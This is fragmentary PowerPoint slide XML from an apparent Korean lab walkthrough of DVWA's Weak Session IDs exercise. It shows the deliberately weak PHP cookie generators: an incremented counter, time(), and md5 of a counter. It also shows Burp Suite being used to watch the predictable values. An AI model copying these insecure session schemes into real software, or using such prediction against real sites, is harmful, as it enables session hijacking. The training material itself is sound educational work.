              <a:ext cx="4159873" cy="2472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5623F1F6-6395-4295-908B-BC8872A91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1400" r="15402" b="27849"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="630567" y="3188846"/>
              <a:ext cx="4185273" cy="24724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ABB66FA-CD63-4A9C-905D-3B7E678C9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48" t="20483" r="34881" b="6492"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="734735" y="3455306"/>
              <a:ext cx="4012525" cy="2602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C31691D-D35A-4B26-93BC-52DBC6BBB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2782" r="24891" b="25324"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="524596" y="3690850"/>
              <a:ext cx="4291244" cy="260238"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:noFill/>
            </a:ln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1B8733C-FD2C-45FC-9BE2-23173A513DE5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2697481" y="2602932"/>
              <a:ext cx="2259918" cy="1348156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6" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5F65C2-6F95-4784-9B39-3276DA146714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469159" y="5476644"/>
            <a:ext cx="5902671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Source code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확인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14B4546-6BC4-4E0C-B805-37B56845C30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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="603845" y="6111890"/>
            <a:ext cx="5656220" cy="1577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67F63257-FBFD-4428-82B9-E87423E1DE5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968583" y="7273959"/>
            <a:ext cx="663995" cy="203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0" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E124C602-548E-4A07-A7F2-CC87807DDB09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548453" y="1792193"/>
            <a:ext cx="5902671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Level : Generate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반복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실행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AD6891B9-1A13-4E01-852F-D813700673F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524596" y="8113807"/>
            <a:ext cx="5902671" cy="7148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View Source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 클릭하여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source code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 확인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A09327-7DE2-4CF2-87AB-342C5BADD7BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630566" y="2339570"/>
            <a:ext cx="5626983" cy="16941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제목 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF5C306-8C35-47B7-AB5D-7640F24F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50279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F062E6C-FA02-4A94-8C45-8E89F12F7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7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685019" y="2330983"/>
            <a:ext cx="5465042" cy="29877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1956391D-5190-45C4-821D-C90252E368D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466205" y="1775147"/>
            <a:ext cx="5902671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Source code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확인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12A8D0C-B467-413F-BEFF-117FB9178AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102289" y="4170599"/>
            <a:ext cx="4935255" cy="4896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E6C36FE0-055E-4B9D-AF2A-75935C7EECB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574329" y="5389597"/>
            <a:ext cx="5902671" cy="29877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30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SESSION[‘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last_session_id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’]++; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" marR="0" lvl="1" indent="-342900" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="1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Session </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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값 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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증가   </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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EDF7F5"/>
              </a:highligh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Cookie value = $SESSION[‘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last_session_id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’]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" marR="0" lvl="1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증가된 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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session </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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값 저장</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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EDF7F5"/>
              </a:highligh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Setcookie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(“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dvwaSession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”, $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cookie_value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);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" marR="0" lvl="1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dvwaSession</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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값 출력</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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EDF7F5"/>
              </a:highligh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8" name="제목 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BDC63E0-6D6C-4A71-B15E-93370F11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1545770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" b="4198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레벨을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2145029" y="5356865"/>
            <a:ext cx="1253462" cy="21525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145039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8" b="4268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824229" y="5080000"/>
            <a:ext cx="1093471" cy="2413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31320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8" b="4268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쿠키를 생성한다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2106929" y="3581400"/>
            <a:ext cx="737871" cy="228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08579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4" b="3524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Suite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도구의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proxy &gt; history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들어온 패킷 중 가장 최근에 들어온 패킷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마지막에 있는 패킷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     선택한 다음 응답 패킷을 보면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 1605528082)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확인할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570440" y="4108044"/>
            <a:ext cx="5717117" cy="1164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ADB5580-062E-418F-BA6E-A558BE1CDD7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701040" y="5796912"/>
            <a:ext cx="1658621" cy="1164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1FB0ED7-39E1-4DAE-A22A-479F281274BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1124403" y="4471459"/>
            <a:ext cx="653597" cy="11641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1901711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8" b="4268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패턴을 파악할 수 없어 다시 쿠키 값을 생성하기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Weak Session IDs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메뉴를 선택하고 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824229" y="5080000"/>
            <a:ext cx="1093471" cy="2413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00388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" b="4527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클릭해 쿠키 값을 생성한다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2101488" y="3541486"/>
            <a:ext cx="714284" cy="21771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481415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0" b="3600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생성된 쿠키 값을 보기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도구에서   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Proxy &gt; HTTP history &gt; Response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들어가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 1605528251)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확인한다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첫 번째로 생성된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 1605528082)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두 번째로 생성된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(= 1605528251)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비교해보면 앞에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1605528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까지는 동일하다는 것을 확인했다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547007" y="4036757"/>
            <a:ext cx="5703321" cy="16485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1814EC-2FF8-46F0-AAC4-9BE1CD7FC6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1154679" y="4436505"/>
            <a:ext cx="639397" cy="16485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684B5-5E99-4BBD-816C-37E84B997D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="705195" y="5750690"/>
            <a:ext cx="1551868" cy="16485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8597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Php.ini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수정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0DF85476-E304-40EF-9BE1-E80207E593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7" t="863" r="34205" b="-863"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5901084" cy="5888564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8060267"/>
            <a:ext cx="5901084" cy="117263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/opt/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lampp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etc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/php.ini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수정한다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allow_url_include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Off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으로 바꿔주고 저장한다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732D5104-C6E4-46AC-BFAE-67C23A52E08B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66513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7" b="3067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정확히 패턴을 예측할 수 없어서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source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클릭해 소스코드를 확인하였다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684B5-5E99-4BBD-816C-37E84B997D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5439241" y="4311650"/>
            <a:ext cx="568020" cy="14460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621429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" r="1025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fontScale="32500" lnSpcReduction="20000"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&lt;?php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$html = “”;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if($_SERVER[‘REQUEST_METHOD’] == “POST”) { </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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서버에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POST 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타입으로 메소드를 요청할 시</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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$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cookie_value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time();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cooke_value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값을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time() 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함수의 리턴 값으로 지정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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time()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함수는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1970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부터 지금까지의 시간 차이를 초단위로 반환한다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setcookie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(“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”, $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cookie_value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);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time()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함수의 반환 값을 쿠키 값으로 하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="20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 쿠키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  <a:p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?&gt;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684B5-5E99-4BBD-816C-37E84B997D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495529" y="3258354"/>
            <a:ext cx="5878629" cy="108215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28954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쿠키의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value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time()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통해 만들어진다는 취약점을 이용해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value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보기 쉽게 만들기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/opt/lamp/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htdocs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/vulnerabilities/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weak_id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source_medium.php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파일을 수정한다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root@kali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:~# vi /opt/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lampp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htdocs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dvwa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/vulnerabilities/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weak_id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2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>source_medium.php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274697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" b="249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fontScale="47500" lnSpcReduction="20000"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&lt;?php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$html = “”;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if($_SERVER[‘REQUEST_METHOD’] == “POST” ) {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$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cookie_value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date(“Y-m-d H:i:s”, time());</a:t>
            </a:r>
          </a:p>
          <a:p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// time() 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함수의 리턴 값을 받아 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date() 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이용해 년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시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sz="20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 형식으로 쿠키 값을 생성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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setcookie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(“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”, $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cookie_value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);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?&gt;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684B5-5E99-4BBD-816C-37E84B997D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478226" y="3206187"/>
            <a:ext cx="5913238" cy="2314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951736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9" b="3159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source_middle.php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수정하고 저장한 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   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Weak Session IDs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클릭해 쿠키 값을 생성한다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684B5-5E99-4BBD-816C-37E84B997D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2222339" y="3831227"/>
            <a:ext cx="717632" cy="2430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184806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1" b="3731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쿠키 값을 생성한 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proxy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메뉴에서 마지막으로 생성된 패킷을 클릭해서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Response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내용을 보면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time()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함수의 반환 값을 사용했을 때보다 패턴을 파악하기 쉬워졌다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684B5-5E99-4BBD-816C-37E84B997D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="4068590"/>
            <a:ext cx="5731650" cy="1330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A9843C-B895-426C-BE3D-53D3CC95FB7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126350" y="4454560"/>
            <a:ext cx="679301" cy="1330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5ECA251-423C-4087-82F2-2088522D6639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520201" y="5759255"/>
            <a:ext cx="5683829" cy="12078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430915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" b="638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security level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소스코드와 차이점을 보기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&gt; Weak Session IDs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메뉴를 선택하고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Source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684B5-5E99-4BBD-816C-37E84B997D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5578997" y="4409956"/>
            <a:ext cx="579344" cy="17762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739157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level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소스코드도 보기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Compare All Levels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684B5-5E99-4BBD-816C-37E84B997D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555583" y="4311650"/>
            <a:ext cx="1157469" cy="16775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4834427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" b="2003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weak session ids source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기존에 세션 값이 존재하지 않았으면 세션 값을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설정하고 세션 값이 존재할 경우 기존의 세션 값에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씩 더해준 다음 세션 값을 이용해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쿠키를 설정한다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low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level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에서는 단순히 세션 값을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씩 더해주기 때문에 쉽게 패턴을 파악할 수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middle weak session ids source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time()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함수의 반환 값을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쿠기의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value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값으로 사용한다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접속한 시간에 따라 쿠키 값이 바뀌므로 패턴을 찾기 어려워 보이지만 앞자리 대부분이 동일하다는 것을 파악하면 시간을 이용해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value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생성했을 거라고 예측이 가능하다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9806102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70BC54E5-5BC5-4474-A8D7-49F65D0642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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="620216" y="2225393"/>
            <a:ext cx="5656220" cy="1577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A3457B7-5AA7-4AAB-AD0A-48F64027B409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741679" y="2866395"/>
            <a:ext cx="877570" cy="172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DED960-670E-4F5F-933A-155DE129C7FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1107439" y="3487912"/>
            <a:ext cx="612698" cy="172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CDD75762-481E-4B5F-B58B-C2C2E87E52D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466204" y="1615706"/>
            <a:ext cx="5902671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Level : High / Generate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실행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363546A-E2F3-4FF7-AD18-3D91ADB2C5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725" b="20410"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568960" y="4557119"/>
            <a:ext cx="5755990" cy="151648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81295A1-CBB3-4A69-A086-97D356F53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705" b="24935"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="612928" y="6683854"/>
            <a:ext cx="5792706" cy="1394491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A610D5D-074A-40B4-8023-757314AA86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185" t="67199" r="703" b="22833"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="855349" y="8078345"/>
            <a:ext cx="5173895" cy="191164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1BC5B3AC-A86A-4C47-87F3-961C8A03D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879" r="46705" b="2382"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="649811" y="8247936"/>
            <a:ext cx="5792706" cy="40386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22D01121-AB63-48D6-9330-28794F3CF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8" t="71684" r="4695" b="22296"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="6062544"/>
            <a:ext cx="4947920" cy="114702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1FC1F1A7-BF11-4D25-BDE4-E7E2674CDFEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1550516" y="5893505"/>
            <a:ext cx="2909724" cy="180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8B63E62-CFE8-4B4A-9F9A-AC8DD6717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41" r="48725" b="11"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568960" y="6198757"/>
            <a:ext cx="5755990" cy="401050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BD09568-1CB8-4BD4-86D7-B0A1BD500901}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1586803" y="7911630"/>
            <a:ext cx="2909724" cy="1800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1BF62AF4-CD00-4F12-89B7-F3C1C462D198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509744" y="3863967"/>
            <a:ext cx="5902671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Generate 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회 반복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실행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FE112-ABEB-4906-8616-C0F7FDB4837E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="568960" y="4508860"/>
            <a:ext cx="5902671" cy="2101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6EA09E-52B8-45AE-9387-E0244F6EC6FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589055" y="6694809"/>
            <a:ext cx="5902671" cy="2101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제목 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F72980-FF62-4790-8747-BFF2F929C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48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config.inc.php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수정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0DF85476-E304-40EF-9BE1-E80207E5932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8" r="18998"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968499"/>
            <a:ext cx="5901084" cy="5355157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6691" y="7537038"/>
            <a:ext cx="5901084" cy="1888881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초록선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부분에 받아온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reCAPTCHA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key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넣어준다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나중에 헷갈리지않게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db_password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는 지워준다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Database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유저가 없다면 에러가 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Root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바꾸거나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유저를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생성해주어야한다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EE72AA4A-408D-4597-B04B-81C6E5B49BE8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5784577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941F0A-0F18-4697-867F-C23DCECC7232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="24254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텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F25A2DB-8767-4B4B-82B4-6859E82EA876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997488" y="2461298"/>
            <a:ext cx="672955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회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39" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3433A4FE-8B21-44D2-BC0D-12037313BE7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="988598" y="2918496"/>
            <a:ext cx="627319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회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7F7155-EE14-447A-ACC7-59EBF1246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9" t="6628" b="5725"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1519900" y="2581342"/>
            <a:ext cx="4443415" cy="3371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875C1E1-781F-4192-AD47-42DCCE0EA3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76" b="9644"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505229" y="3029015"/>
            <a:ext cx="4458086" cy="344716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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9BBD2B6C-1002-4CB0-8C0D-77510085017D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569294" y="3664847"/>
            <a:ext cx="5902671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특징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일반적 규칙이 확인되지 않고 장문의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32bit</a:t>
            </a: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1F2CC32-9D4D-4831-BB88-7D065636598D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466204" y="5241313"/>
            <a:ext cx="5902671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Source code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확인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3A49F6-4734-4AE9-895C-AF564C613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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="600890" y="5876559"/>
            <a:ext cx="5656220" cy="157747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6F191E-DEDB-41B4-A6E5-1597EE1831D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965628" y="7038628"/>
            <a:ext cx="663995" cy="203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6E89369E-8480-4FBF-98FE-A0BFA85ED681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509744" y="1760849"/>
            <a:ext cx="5902671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Generate 2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회 반복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실행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C24BA93E-38D7-44DA-B55F-3AF54986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99358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754402-067D-4A3E-BC26-D512818FCA95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="24254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21F2CC32-9D4D-4831-BB88-7D065636598D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466204" y="1729560"/>
            <a:ext cx="5902671" cy="63524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Source code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확인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89DCF-A965-4E8F-A9A7-EFF120F52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" t="27265" r="8052" b="4092"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="544797" y="2286036"/>
            <a:ext cx="6004619" cy="3112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76F191E-DEDB-41B4-A6E5-1597EE1831D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819404" y="4143344"/>
            <a:ext cx="4441528" cy="240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18B41E51-5EDA-4483-B16E-2A903AB13DF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466204" y="5487490"/>
            <a:ext cx="6010796" cy="15241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dist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$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="2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cookie_value</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="20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=md5($_SESSION[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="20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last_session_id_high</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="200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’]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" marR="0" lvl="1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5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앞에 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="185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부여받은</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1850" b="0" i="0" u="none" strike="noStrike" kern="120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값 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="18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last_session_id_high</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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값을 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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증가  시킨 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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md5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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8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EDF7F5"/>
                </a:highlight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 사용하여 암호화</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="18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EDF7F5"/>
              </a:highlight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D1C4E72-14E4-46B2-87BA-5C654A44E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693" t="83078" r="23911" b="1240"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018108" y="7538142"/>
            <a:ext cx="4952414" cy="7490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34A9D1C-09A1-4D85-BEDF-507206B0D2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41" t="86156" r="25582" b="409"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231706" y="8721562"/>
            <a:ext cx="4683050" cy="63554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2FF90E0-61AA-4C29-9916-31677E36AE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276" b="77430"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="6666003"/>
            <a:ext cx="5178260" cy="753939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61D1E3F-E26C-49FA-ADD0-A6D49C28F7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9" t="6628" b="5725"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261872" y="7307999"/>
            <a:ext cx="4443415" cy="33715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8A315A2-4ED2-4321-81CA-ECD6D5599E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676" b="9644"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231706" y="8366326"/>
            <a:ext cx="4458086" cy="344716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8C3945C-A660-4E80-9BA9-154542F63CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544797" y="6841835"/>
            <a:ext cx="6004619" cy="2515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제목 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D838FD51-0407-4216-979D-83C8C8E21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421766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" b="935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security level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소스코드와 차이점을 보기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&gt; Weak Session IDs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메뉴를 선택하고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Source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684B5-5E99-4BBD-816C-37E84B997D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957763" y="4165659"/>
            <a:ext cx="471487" cy="13487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759174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2" r="2062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level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소스코드도 보기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Compare All Levels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2684B5-5E99-4BBD-816C-37E84B997D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
